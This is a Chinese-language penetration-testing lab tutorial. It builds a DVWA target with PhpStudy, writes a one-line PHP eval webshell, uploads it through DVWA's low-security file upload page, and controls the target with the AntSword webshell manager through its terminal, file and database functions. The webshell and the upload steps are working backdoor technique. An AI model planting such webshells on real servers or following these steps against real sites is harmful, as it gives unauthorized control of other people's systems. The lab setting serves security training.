赞
踩
此资料仅供学习参考,请勿用于非法用途,违者一律承担所有风险
操作机: Windows 10 (安装中国蚁剑)
靶机: Windows 10(安装PhpStudy DVWA,关闭防火墙)ip:192.168.31.131
下载安装包
中国蚁剑:https://pan.baidu.com/s/1V1lvTrArX6lv62Azcegt5w
PhpStudy:https://pan.baidu.com/s/1mW33EQ1MTqU32CQ0LTBlwQ
DVWA:https://pan.baidu.com/s/1We5nieSDi0vQ4aASxsK6Fw
提取码:co6e
实验原理
(1)关于Webshell
Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
(2)关于中国蚁剑
蚁剑是一个开放源代码、跨平台的Webshell管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。
实验步骤
1、搭建渗透环境
将PhpStudy、DVWA下载到靶机并解压到相应位置,这里我都解压到桌面
双击PhpStudy2018.exe文件,我选择安装在C盘
等待自解压完成
PhpStudt已经安装完成
点击其他选项菜单,先退出PhpStudy
双击解压后的DVWA文件夹,把里面的DVWA-master文件夹剪贴在安装PhpStudy文件夹下的PHPTutorial/WWW里
进入DVWA-master/config,把config.inc.php.dist文件改为config.inc.php(删除.dist后缀)然后右键以记事本方式打开此文件
将config.inc.php文件中MySQL数据库的连接用户名由“dvwa”修改为“root”、密码由“p@ssw0rd”修改为“root”,保存并退出
接下来启动PhpStudy,双击然后点击启动
测试一下环境是否搭建成功,在浏览器中输入http://本地ip/DVWA-master
这样渗透环境已经搭建成功
2、写PHP一句话木马(Webshell)
在操作机桌面新建一个文本文档并更名为muma.php
鼠标右键单击muma.php,以记事本的方式打开,在文件中输入以下代码并保存:
<?php @eval($_POST['123456']); ?>
3、利用靶机的文件上传漏洞,将此木马文件(Webshell)上传至靶机
(1)在操作机上启动浏览器,在地址栏中输入以下URL访问靶机上的DVWA网站(如不是登录界面,滑至页面底端,点击Create/Reset Database按钮)
http://[靶机IP]/DVWA-master
(2)成功登录DVWA网站后,在网站主页左侧菜单选择DVWA Security,将网站的安全级别设置为“Low”
(3)在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径
4、利用“中国蚁剑”连接靶机上的muma.php
(1)在操作机上把下载好的蚁剑安装包解压在桌面,进入桌面文件夹AntSword/AntSword-Loader-v4.0.3-win32-x64,鼠标左键双击“AntSword.exe”程序,运行“中国蚁剑”
初次运行“中国蚁剑”时,需要初始化。点击“中国蚁剑”主界面的“初始化”按钮,将桌面AntSword/antSword-master指定为“中国蚁剑”的工作目录
指定完成后,界面会提示手动重启蚁剑程序。可再次进入桌面文件夹/AntSword/AntSword-Loader-v4.0.3-win32-x64,运行“AntSword.exe”程序
(2)在“中国蚁剑”主界面空白处单击鼠标右键,在弹出的菜单中选择“添加数据”
添加一条Webshell管理项:
URL地址:http://[靶机IP]/DVWA-master/hackable/uploads/muma.php
连接密码:123456
连接类型:PHP
设置完成后点击左上角的“添加”按钮,会看到主界面多了一条Webshell管理项
5、利用“中国蚁剑”对靶机进行虚拟终端及文件操作
(1)虚拟终端操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“虚拟终端”
打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(如whoami、id、netstat -an等)
(2)文件操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“文件管理”
打开文件管理界面后,可以像操作本地机器一样,对靶机系统进行一些操作(如上传文件、下载文件、修改文件属性等)
(3)数据操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“数据操作”
打开文件管理界面后,可以对靶机上的数据库系统进行一些操作
实验到此结束。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。